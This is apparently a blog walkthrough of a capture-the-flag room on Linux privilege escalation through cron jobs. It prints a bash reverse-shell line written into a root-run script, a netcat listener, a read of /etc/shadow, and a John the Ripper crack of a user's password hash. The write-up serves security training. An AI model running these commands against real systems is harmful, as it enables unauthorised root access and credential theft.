Privilege Escalation: Cron Jobs

 

Privilege escalation ideally leads to root privileges. This can sometimes be achieved simply by exploiting an existing vulnerability, or in some cases by accessing another user account that has more privileges, information, or access.
 

Cron jobs are used to run scripts or binaries at specific times. By default, they run with the privilege of their owners and not the current user. While properly configured cron jobs are not inherently vulnerable, they can provide a privilege escalation vector under some conditions.

The idea is quite simple; if there is a scheduled task that runs with root privileges and we can change the script that will be run, then our script will run with root privileges.

Cron job configurations are stored as crontabs (cron tables) to see the next time and date the task will run.

Each user on the system have their crontab file and can run specific tasks whether they are logged in or not. As you can expect, our goal will be to find a cron job set by root and have it run our script, ideally a shell.

Any user can read the file keeping system-wide cron jobs under /etc/crontab

While CTF machines can have cron jobs running every minute or every 5 minutes, you will more often see tasks that run daily, weekly or monthly in penetration test engagements.

First we will use ssh and we will come inside his house wihtout informing ( atithi devo bhaava ) :-p

 

 

 

# How many cron jobs can you see on the target system?

Ans: 4

We can list the running cron jobs by typing in cat /etc/crontab

$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * *  root /antivirus.sh
* * * * *  root antivirus.sh
* * * * *  root /home/karen/backup.sh
* * * * *  root /tmp/test.py


$ 

There is one thing remind call..

Crontab is always worth checking as it can sometimes lead to easy privilege escalation vectors. The following scenario is not uncommon in companies that do not have a certain cyber security maturity level:

•     System administrators need to run a script at regular intervals.
•     They create a cron job to do this
•     After a while, the script becomes useless, and they delete it
•     They do not clean the relevant cron job

This change management issue leads to a potential exploit leveraging cron jobs.

if you find antivirus script inside your target machine then there's no file display because file will be deleted by someone but in cronjobs script file is still there so we have a opporunity to exploit them.

If the full path of the script is not defined (as it was done for the backup.sh script), cron will refer to the paths listed under the PATH variable in the /etc/crontab file. In this case, we should be able to create a script named “antivirus.sh” under our user’s home folder and it should be run by the cron job.


If we try to access the “flag5.txt” file present in the “/home/ubuntu” directory, we can see that we don’t have access to it.

Since we know that there’s a cron job set up for the “backup.sh” file to run every min from the previous enumeration, we can attempt to exploit the script here.

We can type in nano backup.sh to open up nano editor and add in our bash reverse shell script to the “backup.sh” file.

#!/bin/bash
bash -i >& /dev/tcp/<OUR_MACHINE_IP>/<PORT> 0>&1

I forgot to check if the script file was set to executable or not, and I kept waiting for the reverse shell and it never connected back, I wasted hours googling, modifying my bash shell, trying to figure out why my cron job script isn’t working. I was about to give up until I noticed the permissions…

I feel dumb for wasting hours on something so simple, but well we all learn from our mistakes, and am no pro anyways.

So, I made the file executable:



chmod +x backup.sh

 

In the other terminal, I started netcat listener and waited for the script to run...

 

nc -nvlp 4444

Now, we can see the content of flag5.txt

 

# What is Matt’s password?

Ans:  

As we already have root privileges, we can access the shadow file and try to crack Matt’s password using John.

root@ip-10-10-32-249:/home/ubuntu# cat /etc/shadow | grep matt
cat /etc/shadow | grep matt
matt:$6$WHmIjebL7MA7KN9A$C4UBJB4WVI37r.Ct3Hbhd3YOcua3AUowO2w2RUNauW8IigHAyVlHzhLrIUxVSGa.twjHc71MoBJfjCTxrkiLR.:18798:0:99999:7:::
root@ip-10-10-32-249:/home/ubuntu# 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kernel-exploit/task9]
└─$ nano mattpassword.txt                                                      
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kernel-exploit/task9]
└─$ sudo john --wordlist=/home/hackerboy/Documents/rockyou.txt mattpassword.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
123456           (?)     
1g 0:00:00:00 DONE (2023-01-07 11:29) 1.492g/s 382.0p/s 382.0c/s 382.0C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kernel-exploit/task9]
└─$ cat mattpassword.txt
$6$WHmIjebL7MA7KN9A$C4UBJB4WVI37r.Ct3Hbhd3YOcua3AUowO2w2RUNauW8IigHAyVlHzhLrIUxVSGa.twjHc71MoBJfjCTxrkiLR.
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kernel-exploit/task9]
└─$ sudo john --show mattpassword.txt                                           
?:123456

1 password hash cracked, 0 left
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/kernel-exploit/task9]
└─$ 

cat /etc/shadow | grep

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.